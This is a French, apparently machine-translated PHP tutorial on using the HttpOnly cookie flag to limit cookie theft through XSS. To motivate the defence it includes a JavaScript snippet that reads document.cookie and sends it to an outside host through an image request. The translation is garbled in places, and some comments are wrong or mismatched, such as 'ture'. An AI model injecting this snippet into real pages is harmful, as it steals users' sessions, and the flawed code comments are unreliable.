PHP utilise httponly pour empêcher les attaques XSS

怪我咯
Libérer: 2023-03-13 18:36:01
original
2222 Les gens l'ont consulté
  1. Qu'est-ce que HttpOnly ?

    Si vous définissez l'attribut HttpOnly dans cookie, les informations du cookie ne seront pas lues via le script js. Ceci est efficace pour. pour empêcher les attaques XSS, veuillez rechercher sur Google une introduction plus spécifique

  2. L'API est-elle prise en charge par javaEE ?

Actuellement, Sun n'a pas annoncé l'API correspondante, mais PHP et C# l'ont implémentée. Les frères qui sont engagés dans javaEE sont assez déprimés, ne vous inquiétez pas, il existe des solutions de contournement ci-dessous

3 Exemple de paramètre HttpOnly

javaEE
response.setHeader("Set-Cookie", "cookiename=value;
Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly");
Copier après la connexion

Cet article présente principalement php pour la défense xss. Utilisez httponly pour empêcher Si une vulnérabilité XSS se produit sur un site Web, du code JS arbitraire peut être exécuté. Le plus terrifiant est que les attaquants utilisent JS pour obtenir un piratage de

cookie

ou de session. contient une grande quantité d’informations sensibles (informations d’identité, informations d’administrateur), etc., c’est tout. . . Le js suivant obtient les informations sur les cookies :

Le code est le suivant :

Les cookies généraux sont obtenus à partir du document
url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;
Copier après la connexion
objet

. Désormais, le navigateur Lors de la configuration des cookies, un paramètre appelé HttpOnly est généralement accepté, tout comme le domaine et les autres paramètres. Une fois ce HttpOnly défini, vous ne verrez pas le cookie dans l'objet document du navigateur.
Paramètres PHP HttpOnly
:

Pour les versions PHP antérieures à PHP5.1 passées :
//在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);

//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);
Copier après la connexion

Enfin, HttpOnly n'est pas un panacée !
header("Set-Cookie: hidden=value; httpOnly");
Copier après la connexion

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Étiquettes associées:
source:php.cn
Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Tutoriels populaires
Plus>
Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal